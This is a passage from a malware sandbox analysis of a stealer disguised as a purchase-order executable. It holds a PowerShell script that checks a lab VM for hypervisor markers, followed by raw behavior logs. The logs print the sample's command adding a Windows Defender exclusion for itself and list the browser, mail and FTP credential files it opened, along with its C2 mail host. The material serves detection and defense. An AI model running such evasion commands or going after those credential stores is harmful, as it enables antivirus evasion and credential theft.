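# related families commonly read them too. Marker strings and MAC OUI prefixes
# are the usual hypervisor defaults (assumption, extend for your lab).

$vendorMarkers = 'VMware', 'VirtualBox', 'innotek', 'Oracle Corporation', 'QEMU',
                 'Xen', 'Parallels', 'Virtual Machine', 'Hyper-V', 'KVM', 'Bochs', 'SeaBIOS'

$virtualOuis = @{
    '00:05:69' = 'VMware';   '00:0C:29' = 'VMware';     '00:1C:14' = 'VMware'
    '00:50:56' = 'VMware';   '08:00:27' = 'VirtualBox'; '00:15:5D' = 'Hyper-V'
    '00:1C:42' = 'Parallels'; '00:16:3E' = 'Xen';       '52:54:00' = 'QEMU/KVM'
}

# Returns the first vendor marker found in a WMI string value, or $null.
function Find-VmMarker {
    param([string]$Value)
    foreach ($marker in $vendorMarkers) {
        if ($Value -and $Value.IndexOf($marker, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
            return $marker
        }
    }
    return $null
}

$findings = [System.Collections.Generic.List[object]]::new()

function Add-Finding([string]$Class, [string]$Property, [string]$Value, [string]$Leak) {
    $findings.Add([pscustomobject]@{ Class = $Class; Property = $Property; Value = $Value; Leak = $Leak })
}

# Same classes the sample reaches through IWbemServices::CreateInstanceEnum / ExecQuery,
# plus the two extra classes noted above.
$probes = @(
    @{ Class = 'Win32_BaseBoard';      Properties = 'Manufacturer', 'Product' }
    @{ Class = 'Win32_Processor';      Properties = 'Name', 'Manufacturer' }
    @{ Class = 'Win32_BIOS';           Properties = 'Manufacturer', 'SMBIOSBIOSVersion', 'SerialNumber' }
    @{ Class = 'Win32_ComputerSystem'; Properties = 'Manufacturer', 'Model' }
)

foreach ($probe in $probes) {
    foreach ($instance in Get-CimInstance -ClassName $probe.Class) {
        foreach ($prop in $probe.Properties) {
            $leak = Find-VmMarker ([string]$instance.$prop)
            if ($leak) { Add-Finding $probe.Class $prop $instance.$prop $leak }
        }
    }
}

# Win32_NetworkAdapterConfiguration: the MAC OUI and the adapter description
# are the usual tells; only IP-enabled adapters are what a stealer normally sees.
foreach ($nic in Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE') {
    if ($nic.MACAddress) {
        $oui = $nic.MACAddress.Substring(0, 8).ToUpperInvariant()
        if ($virtualOuis.ContainsKey($oui)) {
            Add-Finding 'Win32_NetworkAdapterConfiguration' 'MACAddress' $nic.MACAddress $virtualOuis[$oui]
        }
    }
    $leak = Find-VmMarker ([string]$nic.Description)
    if ($leak) { Add-Finding 'Win32_NetworkAdapterConfiguration' 'Description' $nic.Description $leak }
}

if ($findings.Count -eq 0) {
    'No hypervisor markers found in the probed WMI classes.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it inside the analysis VM before detonating; a sample that finds any of these markers typically exits or idles instead of running its payload. The sleep values in the rows above are worth reading next to the probes: 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds, which is a wait with no timeout, and the series from 100000 ms down to 97469 ms in steps of roughly 110 ms is consistent with a loop that recomputes the remaining time after every call, which is how a sample outlasts a sandbox that shortens individual sleeps. A clean result from this script removes the WMI tell only, not the timing one.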

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Queries volume information: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe VolumeInformation
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 1020, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 141 Virtualization/Sandbox Evasion | Security Account Manager | 141 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 2 Data from Local System | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 24 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Source | Detection | Scanner | Label | Link
PURCHASE ORDER-6350-2024.exe | 21% | ReversingLabs | Win32.Trojan.Generic |
PURCHASE ORDER-6350-2024.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.mbarieservicesltd.com | 199.79.62.115 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2051720668.0000000002A21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.mbarieservicesltd.com | PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
199.79.62.115 | mail.mbarieservicesltd.com | United States | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528943
                            Start date and time:2024-10-08 13:52:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:PURCHASE ORDER-6350-2024.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@8/6@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 115
                            • Number of non-executed functions: 5
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: PURCHASE ORDER-6350-2024.exe
Time | Type | Description
07:52:54 | API Interceptor | 24x Sleep call for process: PURCHASE ORDER-6350-2024.exe modified
07:52:56 | API Interceptor | 10x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
199.79.62.115 | order2024-10-07_174915.exe | malicious | AgentTesla |
199.79.62.115 | PO23100070.exe | malicious | AgentTesla |
199.79.62.115 | PO-000001488.exe | malicious | AgentTesla |
199.79.62.115 | Quote 20240533-REV2.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | PO- 220135.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | Quote_4400201477.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | 1460531MES_S Quote.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | QUOTE-4K148388-A-C334.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | PO# 81136575.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | PO_GM_list_30082024202003180817418300824.exe | malicious | AgentTesla |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mail.mbarieservicesltd.com | order2024-10-07_174915.exe | malicious | AgentTesla | 199.79.62.115
mail.mbarieservicesltd.com | PO23100070.exe | malicious | AgentTesla | 199.79.62.115
mail.mbarieservicesltd.com | PO-000001488.exe | malicious | AgentTesla | 199.79.62.115
mail.mbarieservicesltd.com | Quote 20240533-REV2.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | PO- 220135.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | Quote_4400201477.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | 1460531MES_S Quote.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | QUOTE-4K148388-A-C334.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
Match | Associated Sample Name / URL | Detection | Threat Name | Context
PUBLIC-DOMAIN-REGISTRYUS | Cotizaci#U00f3n P13000996 pdf.exe | malicious | AgentTesla | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | shipping.exe | malicious | AgentTesla | 207.174.215.249
PUBLIC-DOMAIN-REGISTRYUS | order2024-10-07_174915.exe | malicious | AgentTesla | 199.79.62.115
PUBLIC-DOMAIN-REGISTRYUS | shipping.exe | malicious | AgentTesla | 207.174.215.249
PUBLIC-DOMAIN-REGISTRYUS | rInvoiceCM60916_xlx.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | Pending invoices.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | ENQUIRY NEED QUOTATION.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | New order.exe | malicious | AgentTesla | 207.174.215.249
PUBLIC-DOMAIN-REGISTRYUS | https://octo9.com.ng/Greula/ | malicious | Unknown | 208.91.199.242
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:true
                                                Reputation:high, very likely benign file
